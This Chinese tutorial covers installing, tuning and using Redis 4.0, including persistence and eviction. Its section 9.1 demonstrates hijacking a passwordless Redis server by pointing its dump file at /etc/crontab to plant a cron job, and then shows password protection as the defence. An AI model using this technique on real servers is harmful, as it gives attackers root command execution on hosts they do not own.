• Redis4.0之持久化存储


    一,redis概述与实验环境说明

    1.1 什么是redis

    redis是一种内存型的NoSQL数据库,优点是快,常用来做缓存用 
    redis存储数据的方法是以key-value的形式 
    value类型支持字符串,列表,哈希等多种类型

    1.2 环境说明

    主机名

    IP

    用途

    Redis01

    10.1.1.146

    Redis-master

    [root@Redis01 ~]# cat /etc/redhat-release
    CentOS Linux release 7.5.1804 (Core)
    [root@Redis01 ~]# uname -r
    3.10.0-862.el7.x86_64
    [root@Redis01 ~]# systemctl stop firewalld
    [root@Redis01 ~]# systemctl disable firewalld
    [root@Redis01 ~]# setenforce 0
    setenforce: SELinux is disabled
    [root@Redis01 ~]# sestatus
    SELinux status:                 disabled

    1.3 yum仓库使用技巧

    查找一个命令出自哪个rpm包

    二,Redis服务器4.0版本源码编译安装

    2.1 redis下载地址https://redis.io/download

    2.2 redis源码编译

    [root@Redis01 ~]# yum -y install wget gcc gcc-c++ make tar openssl openssl-devel cmake 

    [root@Redis01 ~]# tar xf redis-4.0.11.tar.gz -C /usr/src/
    [root@Redis01 ~]# cd /usr/src/redis-4.0.11/
    [root@Redis01 redis-4.0.11]# make && make MALLOC=jemalloc && make PREFIX=/usr/local/redis install

    [root@Redis01 ~]# cd /usr/local/redis/
    [root@Redis01 redis]# ls
    bin
    [root@Redis01 redis]# mkdir -p /usr/local/redis/conf
    [root@Redis01 redis]# cp /usr/src/redis-4.0.11/redis.conf /usr/local/redis/conf/

    [root@Redis01 redis]# cp /usr/src/redis-4.0.11/sentinel.conf /usr/local/redis
    /conf/[root@Redis01 redis]# ln -s /usr/local/redis/bin/* /usr/local/bin/
    [root@Redis01 redis]# which redis-server
    /usr/local/bin/redis-server
    [root@Redis01 redis]# redis-server --version
    Redis server v=4.0.11 sha=00000000:0 malloc=jemalloc-4.0.3 bits=64 build=4d00
    c4dd9c0e3653[root@Redis01 redis]# redis-cli --version
    redis-cli 4.0.11

    (快照)

    三,Redis服务器启动和系统参数调整

    3.1 简化redis配置文件

    [root@Redis01 redis]# pwd
    /usr/local/redis
    [root@Redis01 redis]# cp conf/redis.conf{,.bak}
    [root@Redis01 redis]# egrep -v "^$|^#" conf/redis.conf.bak > conf/redis.conf
    [root@Redis01 redis]# mkdir -p /data/redis/  创建redis数据目录

    修改redis配置文件以下参数

    修改成以下设置

     [root@Redis01 redis]# vim conf/redis.conf
    [root@Redis01 redis]# cat -n conf/redis.conf | sed -n '1p;3p;4p;7p;9p;11p;21p'
         1    bind 0.0.0.0  #监听地址
         3    port 6379   #监听端口
         4    tcp-backlog 1024  #tcp连接数
         7    daemonize yes  #是否后台启动
         9    pidfile /data/redis/redis.pid    #pid存放目录
        11    logfile "/data/redis/redis.log"   #日志存放目录
        21    dir /data/redis  #工作目录

    3.3 redis服务器启动和关闭

    启动redis服务器
    [root@Redis01 redis]# redis-server /usr/local/redis/conf/redis.conf
    [root@Redis01 redis]# netstat -antup | grep redis
    tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN     
     17416/redis-server 

     关闭redis服务器

    [root@Redis01 redis]# redis-cli -p 6379 -h 127.0.0.1 shutdown
    [root@Redis01 redis]# netstat -antup | grep redis
    [root@Redis01 redis]# redis-server /usr/local/redis/conf/redis.conf
    [root@Redis01 redis]# netstat -antup | grep redis
    tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN     
     17426/redis-server 

    [root@Redis01 redis]# redis-cli shutdown
    [root@Redis01 redis]# netstat -antup | grep redis
    连接redis服务器

    [root@Redis01 ~]# redis-server /usr/local/redis/conf/redis.conf
    [root@Redis01 ~]# redis-cli -h 127.0.0.1
    127.0.0.1:6379> exit
    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> exit

    3.4 系统参数优化调整

    启动redis以后,我们查看系统日志 cat /data/redis/redis.log

    警告提示1:系统文件描述符设置的太小了,才1024,我们最好设置到10032

    警告提示2:对一个高负载的环境来说tcp设置128这个值,太小了。

    警告提示3:overcommit_memory=0为不允许超额抢占内存,但是,rdb保存可能会失败。建议将vm.overcommit_memory = 1进行修改

    警告提示4:你的内核中启用了巨大内存页的支持,这将与redis的延迟内存使用冲突。

     1)调整系统文件描述符

     [root@Redis01 ~]# echo "* - nofile 10240" >> /etc/security/limits.conf

     退出登陆一下即可生效

     [root@Redis01 ~]# exit

     [root@Redis01 ~]# ulimit -n
    10240

    2)调整系统tcp连接数

    [root@Redis01 ~]# sysctl -a | grep soma
    net.core.somaxconn = 128
    sysctl: reading key "net.ipv6.conf.all.stable_secret"
    sysctl: reading key "net.ipv6.conf.default.stable_secret"
    sysctl: reading key "net.ipv6.conf.ens32.stable_secret"
    sysctl: reading key "net.ipv6.conf.lo.stable_secret"
    [root@Redis01 ~]# echo "net.core.somaxconn = 10240" >> /etc/sysctl.conf
    [root@Redis01 ~]# sysctl -p
    net.core.somaxconn = 10240

    3)调整系统内存分配策略

    [root@Redis01 ~]# echo "vm.overcommit_memory = 1" >> /etc/sysctl.conf
    [root@Redis01 ~]# sysctl -p
    net.core.somaxconn = 10240
    vm.overcommit_memory = 1
    [root@Redis01 ~]# sysctl -a | grep commit
    sysctl: reading key "net.ipv6.conf.all.stable_secret"
    sysctl: reading key "net.ipv6.conf.default.stable_secret"
    sysctl: reading key "net.ipv6.conf.ens32.stable_secret"
    sysctl: reading key "net.ipv6.conf.lo.stable_secret"
    vm.nr_overcommit_hugepages = 0
    vm.overcommit_kbytes = 0
    vm.overcommit_memory = 1  #设置好了
    vm.overcommit_ratio = 50

    4)关闭系统内核的巨大内存页支持

    [root@Redis01 ~]# echo never > /sys/kernel/mm/transparent_hugepage/enabled
    [root@Redis01 ~]# cat /sys/kernel/mm/transparent_hugepage/enabled
    always madvise [never]
    [root@Redis01 ~]# echo never > /sys/kernel/mm/transparent_hugepage/defrag
    [root@Redis01 ~]# cat /sys/kernel/mm/transparent_hugepage/defrag
    always madvise [never]

    添加到/etc/rc.local

    [root@Redis01 ~]# echo 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' >> /etc/rc.local

    [root@Redis01 ~]# echo 'echo never > /sys/kernel/mm/transparent_hugepage/defrag' >> /etc/rc.local

    [root@Redis01 ~]# tail -2 /etc/rc.local
    echo never > /sys/kernel/mm/transparent_hugepage/enabled
    echo never > /sys/kernel/mm/transparent_hugepage/defrag

    5)重启redis-server验证修改

    关闭redis     清空日志     启动redis

    四,Redis客户端使用和字符串简单操作

    • mysql命令用来跟MySQL服务器进行交互
    • redis-cli命令用来跟redis服务器进行交互

    4.1 使用redis-cli客户端登陆redis-server

    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> exit
    [root@Redis01 ~]# redis-cli -h localhost -p 6379
    localhost:6379> exit

    4.2 redis字符串操作

    4.1 使用redis-cli客户端登陆redis-server

    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> set name wwl    #增加键(key)和值(value)
    OK
    127.0.0.1:6379> get name #根据键获取值
    "wwl"
    127.0.0.1:6379> set name xiaomei    #修改键的值
    OK
    127.0.0.1:6379> get name   #根据键获取值
    "xiaomei"
    127.0.0.1:6379> del name   #删除,返回1代表删除成功
    (integer) 1
    127.0.0.1:6379> GET name  #命令不区分大小写
    (nil)
    127.0.0.1:6379> set NAME test
    OK
    127.0.0.1:6379> get name
    (nil)
    127.0.0.1:6379> get NAME   #key区分大小写
    "test"
    127.0.0.1:6379> del NAME
    (integer) 1

    4.3 非交互式操作redis服务器

    [root@Redis01 ~]# redis-cli set name welcome
    OK
    [root@Redis01 ~]# redis-cli get name
    "welcome"
    [root@Redis01 ~]# redis-cli del name
    (integer) 1
    [root@Redis01 ~]# redis-cli get name
    (nil)

    五,Redis列表集合简单操作

    redis的key都是字符串,value支持字符串,列表,集合等

    5.1 redis列表的操作,有序的可重复的

    列表就是有顺序的,可重复的一堆值的组合

    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> lpush names yun1    #创建一个列表names,并从左边推入一个值yun1
    (integer) 1
    127.0.0.1:6379> lpush names yun2    #向列表names左边推入一个值yun2
    (integer) 2
    127.0.0.1:6379> lpush names yun3
    (integer) 3
    127.0.0.1:6379> lpush names yun4
    (integer) 4
    127.0.0.1:6379> lpush names yun5
    (integer) 5
    127.0.0.1:6379> lrange names 0 -1  #查看列表names从索引0开始到结束所有的值
    1) "yun5"
    2) "yun4"
    3) "yun3"
    4) "yun2"
    5) "yun1"
    127.0.0.1:6379> lrange names 0 1     #查看索引0到1的值
    1) "yun5"
    2) "yun4"
    127.0.0.1:6379> lrange names 0 3
    1) "yun5"
    2) "yun4"
    3) "yun3"
    4) "yun2"
    127.0.0.1:6379> lrange names 0 0
    1) "yun5"
    127.0.0.1:6379> lpush names yun  
    (integer) 6
    127.0.0.1:6379> lpush names yun
    (integer) 7
    127.0.0.1:6379> lrange names 0 -1
    1) "yun"
    2) "yun"
    3) "yun5"
    4) "yun4"
    5) "yun3"
    6) "yun2"
    7) "yun1"
    127.0.0.1:6379> lrem names 1 yun  #从左边数删除第一个yun
    (integer) 1
    127.0.0.1:6379> lrem names 1 yun
    (integer) 1
    127.0.0.1:6379> lrange names 0 -1
    1) "yun5"
    2) "yun4"
    3) "yun3"
    4) "yun2"
    5) "yun1"
    127.0.0.1:6379> lpush names xue   #从列表的左边加入一个元素xue
    (integer) 6
    127.0.0.1:6379> lpush names xue
    (integer) 7
    127.0.0.1:6379> lrange names 0 -1
    1) "xue"
    2) "xue"
    3) "yun5"
    4) "yun4"
    5) "yun3"
    6) "yun2"
    7) "yun1"
    127.0.0.1:6379> lrem names 0 xue   #从列表的左边数删除所有的雪
    (integer) 2
    127.0.0.1:6379> lrange names 0 -1
    1) "yun5"
    2) "yun4"
    3) "yun3"
    4) "yun2"
    5) "yun1"
    127.0.0.1:6379> lpop names  #移除列表最左边的元素
    "yun5"
    127.0.0.1:6379> lpop names
    "yun4"
    127.0.0.1:6379> lpop names
    "yun3"
    127.0.0.1:6379> lpop names
    "yun2"
    127.0.0.1:6379> lpop names
    "yun1"
    127.0.0.1:6379> lpush names lili
    (integer) 1
    127.0.0.1:6379> lpush names lili1
    (integer) 2
    127.0.0.1:6379> lpush names lili12
    (integer) 3
    127.0.0.1:6379> lrange names 0 -1
    1) "lili12"
    2) "lili1"
    3) "lili"
    127.0.0.1:6379> rpop names    #移除列表最右边的元素
    "lili"
    127.0.0.1:6379> rpop names
    "lili1"
    127.0.0.1:6379> rpop names
    "lili12"
    127.0.0.1:6379> lpush wang haha1
    (integer) 1
    127.0.0.1:6379> lpush wang haha2
    (integer) 2
    127.0.0.1:6379> lpush wang haha3
    (integer) 3
    127.0.0.1:6379> lrange wang 0 -1
    1) "haha3"
    2) "haha2"
    3) "haha1"
    127.0.0.1:6379> lset wang 0 www   #修改列表左起第一个元素
    OK
    127.0.0.1:6379> lrange wang 0 -1
    1) "www"
    2) "haha2"
    3) "haha1"

    5.2 redis集合的操作,无序的不重复的

    集合就是不能重复的,无固定顺序的列表

    127.0.0.1:6379> sadd ages 10    #向集合中添加元素
    (integer) 1
    127.0.0.1:6379> sadd ages 15
    (integer) 1
    127.0.0.1:6379> sadd ages 20
    (integer) 1
    127.0.0.1:6379> sadd ages 25
    (integer) 1
    127.0.0.1:6379> sadd ages 25    #失败,集合的元素具有唯一性
    (integer) 0
    127.0.0.1:6379> smembers ages    #查看集合里的元素
    1) "10"
    2) "15"
    3) "20"
    4) "25"
    127.0.0.1:6379> srem ages 25     #移除集合里是25的元素
    (integer) 1
    127.0.0.1:6379> smembers ages
    1) "10"
    2) "15"
    3) "20"
    127.0.0.1:6379> spop ages   #随机移除集合里的一个元素
    "10"
    127.0.0.1:6379> smembers ages
    1) "15"
    2) "20"
    127.0.0.1:6379> sismember ages 40  #查找集合里是否有40的元素
    (integer) 0        #集合里没有40的元素
    127.0.0.1:6379> sismember ages 15
    (integer) 1

    六,Redis的hash和订阅简单操作

    6.1 redis的hash操作

    hash就是可以存多个键值对的组合(类似python字典)

    127.0.0.1:6379> hset info name 'yunjisuan'   #增加一个hash
    (integer) 1
    127.0.0.1:6379> hset info age 25
    (integer) 1
    127.0.0.1:6379> hset info location 'beijing'
    (integer) 1
    127.0.0.1:6379> hgetall info
    1) "name"
    2) "yunjisuan"
    3) "age"
    4) "25"
    5) "location"
    6) "beijing"
    127.0.0.1:6379> hget info name
    "yunjisuan"
    127.0.0.1:6379> hdel info name age
    (integer) 2
    127.0.0.1:6379> hgetall info
    1) "location"
    2) "beijing"
    127.0.0.1:6379> del info
    (integer) 1
    127.0.0.1:6379> hmset info name 'yunjisuan' age 25 location 'beijing'
    OK
    127.0.0.1:6379> hgetall info
    1) "name"
    2) "yunjisuan"
    3) "age"
    4) "25"
    5) "location"
    6) "beijing"

    6.2 redis的订阅操作

    开启redis的订阅功能
    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> subscribe yunjisuan    #开启频道名:yunjisuan的订阅功能,可开启多个窗口进行订阅
    Reading messages... (press Ctrl-C to quit)
    1) "subscribe"
    2) "yunjisuan"
    3) (integer) 1
    对频道进行内容推送
    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> publish yunjisuan '你真美'     #向频道yunjisuan推送你真美
    (integer) 1     #推送成功的人数
    再开两个窗口,查看订阅信息
    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> subscribe yunjisuan
    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> subscribe yunjisuan
    127.0.0.1:6379> publish yunjisuan 'nihao'
    (integer) 3
    关掉登录一个
    127.0.0.1:6379> publish yunjisuan 'hahaha'
    (integer) 2

    七,使用Shell往Redis批量添加数据

    1)批量往redis server上插入数据

    [root@Redis01 ~]# for line in `seq -w 10`;do redis-cli set name_${line} value_${line};done

    2)查看key的情况

    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> keys *    #查看所有key命令,不建议使用,上千万的key会使redis服务器堵塞
     1) "name_03"
     2) "name_08"
     3) "name_07"
     4) "name_02"
     5) "name_10"
     6) "name_09"
     7) "name_06"
     8) "name_05"
     9) "name_01"
    10) "name_04"
    127.0.0.1:6379> randomkey   #随机返回一个key
    "name_02"
    127.0.0.1:6379> randomkey
    "name_07"
    127.0.0.1:6379> scan 0   #分页查看key
    1) "0"
    2)  1) "name_08"
        2) "name_07"
        3) "name_02"
        4) "name_10"
        5) "name_09"
        6) "name_03"
        7) "name_06"
        8) "name_05"
        9) "name_01"
       10) "name_04"

    八,Redis服务器info状态信息查看

    redis提供了一个info命令查看redis服务器的信息,类似Linux提供一个top命令查看系统的信息

    [root@Redis01 ~]# redis-cli info
    # Server    #服务器的信息
    redis_version:4.0.11     #redis服务器版本
    redis_git_sha1:00000000   #Git SHA1
    redis_git_dirty:0      #Git dirty flag
    redis_build_id:4d00c4dd9c0e3653     #redis build id
    redis_mode:standalone     #运行模式,单机或集群
    os:Linux 3.10.0-862.el7.x86_64 x86_64   #redis服务器宿主机操作系统
    arch_bits:64     #架构64位
    multiplexing_api:epoll       #redis所使用的事件处理模型
    atomicvar_api:atomic-builtin
    gcc_version:4.8.5     #编译redis时gcc版本
    process_id:17876    #redis服务器进程的pid
    run_id:be4b0e741fa09976438795ea0d240bfcce94330d  #redis服务器的随机标识符(sentinel和集群)
    tcp_port:6379  
    uptime_in_seconds:3989
    uptime_in_days:0
    hz:10
    lru_clock:3099797
    executable:/root/redis-server
    config_file:/usr/local/redis/conf/redis.conf

    # Clients
    connected_clients:1
    client_longest_output_list:0
    client_biggest_input_buf:0
    blocked_clients:0

    # Memory
    used_memory:849248
    used_memory_human:829.34K
    used_memory_rss:2428928
    used_memory_rss_human:2.32M
    used_memory_peak:910592
    used_memory_peak_human:889.25K
    used_memory_peak_perc:93.26%
    used_memory_overhead:836686
    used_memory_startup:786592
    used_memory_dataset:12562
    used_memory_dataset_perc:20.05%
    total_system_memory:1021906944
    total_system_memory_human:974.57M
    used_memory_lua:37888
    used_memory_lua_human:37.00K
    maxmemory:0
    maxmemory_human:0B
    maxmemory_policy:noeviction
    mem_fragmentation_ratio:2.86
    mem_allocator:jemalloc-4.0.3
    active_defrag_running:0
    lazyfree_pending_objects:0

    # Persistence
    loading:0
    rdb_changes_since_last_save:7
    rdb_bgsave_in_progress:0
    rdb_last_save_time:1546603255
    rdb_last_bgsave_status:ok
    rdb_last_bgsave_time_sec:0
    rdb_current_bgsave_time_sec:-1
    rdb_last_cow_size:352256
    aof_enabled:0
    aof_rewrite_in_progress:0
    aof_rewrite_scheduled:0
    aof_last_rewrite_time_sec:-1
    aof_current_rewrite_time_sec:-1
    aof_last_bgrewrite_status:ok
    aof_last_write_status:ok
    aof_last_cow_size:0

    # Stats
    total_connections_received:27
    total_commands_processed:144
    instantaneous_ops_per_sec:0
    total_net_input_bytes:4876
    total_net_output_bytes:124503
    instantaneous_input_kbps:0.00
    instantaneous_output_kbps:0.00
    rejected_connections:0
    sync_full:0
    sync_partial_ok:0
    sync_partial_err:0
    expired_keys:0
    expired_stale_perc:0.00
    expired_time_cap_reached_count:0
    evicted_keys:0
    keyspace_hits:25
    keyspace_misses:11
    pubsub_channels:0
    pubsub_patterns:0
    latest_fork_usec:105
    migrate_cached_sockets:0
    slave_expires_tracked_keys:0
    active_defrag_hits:0
    active_defrag_misses:0
    active_defrag_key_hits:0
    active_defrag_key_misses:0

    # Replication
    role:master
    connected_slaves:0
    master_replid:e2baa8fec4ff2b9aa764c386381e9c6556d4c5a0
    master_replid2:0000000000000000000000000000000000000000
    master_repl_offset:0
    second_repl_offset:-1
    repl_backlog_active:0
    repl_backlog_size:1048576
    repl_backlog_first_byte_offset:0
    repl_backlog_histlen:0

    # CPU
    used_cpu_sys:1.65
    used_cpu_user:1.15
    used_cpu_sys_children:0.00
    used_cpu_user_children:0.00

    # Cluster
    cluster_enabled:0

    # Keyspace
    db0:keys=10,expires=0,avg_ttl=0

    九,Redis服务器加密和无密码攻击演示

    在这之前先演示一下怎么操作redis
    修改redis的配置文件一般都要重启redis,但是redis有一种平滑修改的功能
    [root@Redis01 ~]# cd /data/redis/
    [root@Redis01 redis]# ls
    dump.rdb  redis.log  redis.pid
    默认redis是开着持久化存储的,我们给它关了
    配置文件里查找一下和save有关的参数
    127.0.0.1:6379> config get save
    1) "save"
    2) "900 1 300 10 60 10000"
    因为之前我的机器快照过,所以会有这些信息,现在要去掉它的持久化

    127.0.0.1:6379> config set save ""
    OK
    127.0.0.1:6379> config get save
    1) "save"
    2) ""
    这时它的配置文件没有任何变化,执行重写配置文件,再看配置文件已经发生了变化,save的信息已经没了

    127.0.0.1:6379> config rewrite
    OK

    这就是redis的平滑修改,不需要重启配置文件

    127.0.0.1:6379> config get dir
    1) "dir"
    2) "/data/redis"
    我们用config get dir发现,redis的工作目录我们都会知道在哪,因此我们只要连上redis,就能够修改它的配置文件

    9.1 入侵无密码redis服务器演示
    开启Redis02,测试效果,开始攻击
    [root@Redis02 ~]# redis-cli -h 10.1.1.146 -p 6379
    10.1.1.146:6379> config get dir
    1) "dir"
    2) "/data/redis"
    攻击之前记得将redis01快照一下。。。。。
    10.1.1.146:6379> config set dir /etc/
    OK
    10.1.1.146:6379> config set dbfilename "crontab"
    OK
    10.1.1.146:6379> config set save "900 1 300 10 60 10000"
    OK
    10.1.1.146:6379> config get save
    1) "save"
    2) "900 1 300 10 60 10000"
    10.1.1.146:6379> config rewrite
    OK
    [root@Redis02 ~]# echo "* * * * * root echo 'attack'" >> /tmp/attack
    [root@Redis02 ~]# vim /tmp/attack
    [root@Redis02 ~]# cat /tmp/attack    #这个文件内容上下必须各有两个回车


    * * * * * root echo 'attack'


    [root@Redis02 ~]# cat /tmp/attack | redis-cli -h 10.1.1.146 -x set attack
    OK
    [root@Redis02 ~]# redis-cli -h 10.1.1.146 save
    OK

    然后你的redis服务器就会被攻击了

    redis无密码如果放在公网的话,会被攻击

    9.2给redis增加密码的两种方式

    (1)通过redis配置文件增加密码

    给配置文件增加密码参数
    [root@Redis01 ~]# echo 'requirepass "yunjisuan"' >> /usr/local/redis/conf/redis.
    conf[root@Redis01 ~]# tail -1 /usr/local/redis/conf/redis.conf
    requirepass "yunjisuan"
    [root@Redis01 ~]# redis-cli shutdown
    [root@Redis01 ~]# redis-server /usr/local/redis/conf/redis.conf
    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> keys *
    (error) NOAUTH Authentication required.
    127.0.0.1:6379> auth yunjisuan
    OK
    127.0.0.1:6379> set name benet
    OK
    非交互式输入密码进行登录
    [root@Redis01 ~]# redis-cli -h 127.0.0.1 -p 6379 -a yunjisuan get name
    Warning: Using a password with '-a' option on the command line interface may not be safe.

    "benet"
    警告:使用-a方式输入密码并不安全

    (2)使用交互式的方式给redis增加密码(无需重启redis)

    将之前在配置文件里设置的密码参数删除
    [root@Redis01 ~]# sed -i '$d' /usr/local/redis/conf/redis.conf
    重启redis-server
    [root@Redis01 ~]# redis-cli -a yunjisuan shutdown
    Warning: Using a password with '-a' option on the command line interface may not
     be safe.[root@Redis01 ~]# redis-server /usr/local/redis/conf/redis.conf
    [root@Redis01 ~]# netstat -antup | grep redis
    tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN      
    23539/redis-server 
    交互式登陆redis设置密码
    127.0.0.1:6379> set name benet
    OK
    127.0.0.1:6379> get name
    "benet"
    127.0.0.1:6379> config get requirepass
    1) "requirepass"
    2) ""
    127.0.0.1:6379> config set requirepass yunjisuan
    OK
    127.0.0.1:6379> config get requirepass
    (error) NOAUTH Authentication required.
    127.0.0.1:6379> auth yunjisuan
    OK
    127.0.0.1:6379> config get requirepass
    1) "requirepass"
    2) "yunjisuan"
    127.0.0.1:6379> config rewrite
    OK
    127.0.0.1:6379> exit
    [root@Redis01 ~]# tail -2 /usr/local/redis/conf/redis.conf
    # Generated by CONFIG REWRITE
    requirepass "yunjisuan"

    十,Redis的RDB存储方式

    10.1 redis的运行方式说明

    redis如果提供缓存服务,可以关闭所有持久化存储,如此一来redis重启后所有数据会丢失 
    开启rdb或aof持久化存储,能把redis中的数据持久化到磁盘中。 
    rdb和aof对性能都有影响,所以建议持久化的操作在从库上进行

    10.2 redis rdb存储方式,使用save配置开启rdb存储或者关闭rdb存储

    与rdb相关的配置文件信息

    dir /data/redis/    #dir为rdb存储的路径

    dbfilename dump.rdb #rdb存储文件的名字

    save 60 10000       #60s改变10000key,触发rdb存储

    save 300 10         #300s改变10个key,触发rdb存储

    save 900 1          #900s改变1个key触发rdb存储

    rdbcompression no   #rdb压缩最好关闭,影响cpu

    0.3 设置开启或者关闭rdb存储

    提示:默认情况下rdb持久化存储是开启的

    [root@Redis01 ~]# redis-cli config set save " " #关闭rdb存储
    OK
    [root@Redis01 ~]# redis-cli config rewrite #配置保存
    OK
    [root@Redis01 ~]# redis-cli config set save "180 1 120 10 60 10000"   #开启rdb
    OK
    [root@Redis01 ~]# redis-cli config rewrite
    OK
    flushdb或flushall代表清空redis的数据(这两个命令以后也是要屏蔽掉的,很危险)
    redis-cli info 查看redis里有多少个键,键的总数

    10.4 进行数据写入,观察rdb存储日志

    输入1万条数据

    for line in `seq -w 10000`;do redis-cli set key_${line} value1_${line};done

    查看日志信息cat /data/redis/redis.log

    发生了1万条数据改变60秒内,触发rdb存储

    10.5 redis提供的bgsave命令能够立刻触发rdb存储,观察存储日志

    [root@Redis01 ~]# redis-cli save  #会阻塞前端客户数据输入
    OK
    [root@Redis01 ~]# redis-cli bgsave   #后台启动新进程进行rdb存储
    Background saving started

    #查看日志

    [root@Redis01 ~]# cat /data/redis/redis.log

    1228:M 04 Jan 22:26:53.345 * DB saved on disk       #save触发的日志信息
    1228:M 04 Jan 22:27:00.370 * Background saving started by pid 25038     #bgsave触发的信息
    25038:C 04 Jan 22:27:00.376 * DB saved on disk  #bgsave触发的信息
    25038:C 04 Jan 22:27:00.377 * RDB: 0 MB of memory used by copy-on-write  #bgsave触发的信息
    1228:M 04 Jan 22:27:00.392 * Background saving terminated with success   #bgsave触发的信息

    十一,Redis的AOF存储方式

    redis的appendonly(aof)持久化存储会把用户每次的操作都记录到文件中(类似mysqlbinlog)

    11.1 动态开启或者关闭aof

    [root@Redis01 ~]# redis-cli
    127.0.0.1:6379> config get appendonly
    1) "appendonly"
    2) "no"
    127.0.0.1:6379> config set appendonly "yes"
    OK
    127.0.0.1:6379> config rewrite
    OK

    11.2 写入数据,观察aof。多次运行,aof文件不断增大,rdb文件大小不变(略)

    开启rdb之后瞬间就有了,这时数据库里的数据都已经被写过来了

    [root@Redis01 redis]# cat appendonly.aof
    [root@Redis01 redis]# du -sh appendonly.aof
    460K    appendonly.aof
    127.0.0.1:6379> flushdb
    OK
    127.0.0.1:6379> bgrewriteaof
    Background append only file rewriting started

    11.3 重写aof文件,整理相同的key,写入最后的有效值

    BGREWRITEAOF 
    执行一个AOF文件重写操作。重写会创建一个当前AOF文件的体积优化版本 
    即使BGREWRITEAOF执行失败,也不会有任何数据丢失,因为旧的AOF文件在BGREWRITEAOF成功之前不会被修改。 
    重写操作只会在没有其他持久化工作在后台执行时被触发。 
    从Redis2.4开始,AOF重写由Redis自行触发,BGREWRITEAOF仅仅用于手动触发重写操作。

    AOF默认情况下,也是和binlog日志一样增量往里面写的,测试如下:

    127.0.0.1:6379> set name benent
    OK

    redis有16个库,0-15,默认是在0里面写的
    [root@Redis01 redis]# cat appendonly.aof
    *2
    $6      (指的是下一个命令的字符数)
    SELECT
    $1
    0  ( 先切进第0个大表)
    *3
    $3
    set(之后的动作)
    $4
    name(之后的动作)
    $6
    benent(之后的动作)


    127.0.0.1:6379> select 0
    OK
    127.0.0.1:6379> keys *
    1) "name"
    127.0.0.1:6379> select 1
    OK
    127.0.0.1:6379[1]> keys *
    (empty list or set)
    redis不像mysql有库名还有表名,可以理解成它只有(0-15)16张大表或者16个大库,刚开始是默认在第0张大表里,往里写的键都在那里面,select 1就相当于切换到1这个大表里了,所以里面没有,是空的

    这就是aof文件里面记录的,但是它不好的地方也很突出

    127.0.0.1:6379> select 0
    OK
    127.0.0.1:6379> del name
    (integer) 1

    再看一下aof是怎么记录的
    [root@Redis01 redis]# cat appendonly.aof
    *2
    $6
    SELECT
    $1
    0
    *3
    $3
    set
    $4
    name
    $6
    benent
    *2
    $3
    del
    $4
    name

    我们发现虽然我们向redis添加了一个key,又删除了这个key。redis数据库从本质上来说并没有新增任何数据。但是aof文件仍旧把操作都给记录了。这样就会导致aof文件最终会非常大。所以aof文件的优化,就是让aof文件进行重写,只记录数据的增量部分。如此aof文件就小很多了。

    完全复制了我之前的操作,但是在数据库里,一加一删是没用的,反而还会占大小,如果它一直这么记录下去,这个文件会越来越大,因此,在3.0之前运维都会写一个脚本,让它自动触发一个叫做bgrewriteaof,它的作用是优化aof,把所有的没有产生增量的aof文件里记录的数据全都删了
    触发一下这个命令

    里面就没东西了,将所有没有产生增量的语句全去掉了

    但是4.0就不用了,它有自动触发

    11.4 aof配置自动rewrite机制

    在默认配置文件里,默认存在

    获取aof-rewrite配置

    127.0.0.1:6379> config get auto-aof-rewrite*
    1) "auto-aof-rewrite-percentage"
    2) "100"     #默认100%,也就是aof增加一倍后考虑rewrite,两个条件要同时满足
    3) "auto-aof-rewrite-min-size"
    4) "67108864"     #默认64mb,也就是aof达到64M后考虑rewirte,两个条件要同时满足

    这就是为什么之前导入了一万条数据却发现aof并没有多大的原因
    aof和binlog还有一个最大的不同是,binlog就记录之后的,aof一旦重写,它不光重写之后的,所有的键它都会写进去,aof文件是可以来进行数据迁移的,rdb是用来做主从复制的

    [root@Redis01 ~]# for line in `seq -w 10000`;do redis-cli set key_${line} value
    1_${line};done

    刚开aof,如果它是增量的话,文件大小应该是0,如果它没有自动触发aof重写的话,它也是0,但是由于一万条太多了它就自动触发这个机制了,aof重写还用来数据迁移,也就是说aof现在是460k,里面所有的键都写到了aof里了,而且是增量写的,只要触发了aof,它是把redis里的所有的键重新写一遍

    aof在工作中是用来做数据迁移的,rdb是用来做主从复制的

    aof数据迁移也有很多种方式,如果能够ping通,直接建个从库数据就迁移过去了,比如要把redis从本地迁移到云上,在云上建一个从库,如果能连到公司里,数据自己就过去了,数据过去之后,再把它变成主库就行了,如果碰到不通的,数据连接不了,那就要把aof文件给弄过去。

    十二,Redis最大内存设置和删除算法

    redis-cli flushall #手动清空redis里所有数据

    12.1 redis的键设置有效期,过期自动删除

    127.0.0.1:6379> set name yunjisuan
    OK
    127.0.0.1:6379> get name
    "yunjisuan"
    127.0.0.1:6379> ttl name
    (integer) -1
    127.0.0.1:6379> expire name 5
    (integer) 1
    127.0.0.1:6379> ttl name
    (integer) 3
    127.0.0.1:6379> ttl name
    (integer) 2
    127.0.0.1:6379> ttl name
    (integer) 1
    127.0.0.1:6379> ttl name
    (integer) 0
    127.0.0.1:6379> ttl name
    (integer) -2
    127.0.0.1:6379> get name
    (nil)

    12.2 查看设置最大内存

    查看和设定最大内存限制
    127.0.0.1:6379> config get maxmemory
    1) "maxmemory"
    2) "0"      #默认对内存无限制

    限制1M

    127.0.0.1:6379> config set maxmemory 1M
    OK
    127.0.0.1:6379> config get maxmemory
    1) "maxmemory"
    2) "1000000"
    127.0.0.1:6379> config rewrite
    OK

    12.3 可选择的删除算法

    • volatile-lru: 
      • 使用LRU算法删除键(key需要设置过期时间)
    • volatile-random: 
      • 随机删除键(key需要设置过期时间)
    • volatile-ttl: 
      • 删除ttl最小的键(key需要设置过期时间)
    • allkeys-lru: 
      • 使用LRU算法删除键(所有key)
    • allkeys-random: 
      • 随机删除键(所有key)
    • noeviction: 
      • 不进行任何的操作,只返回错误,默认

    [root@Redis01 ~]# redis-cli config get maxmemory-policy
    1) "maxmemory-policy"
    2) "noeviction"
    在工作中最常用的是LRU算法,一旦内存不够用了,它会优先删除设了过期时间的键值

    12.4 模拟超过内存

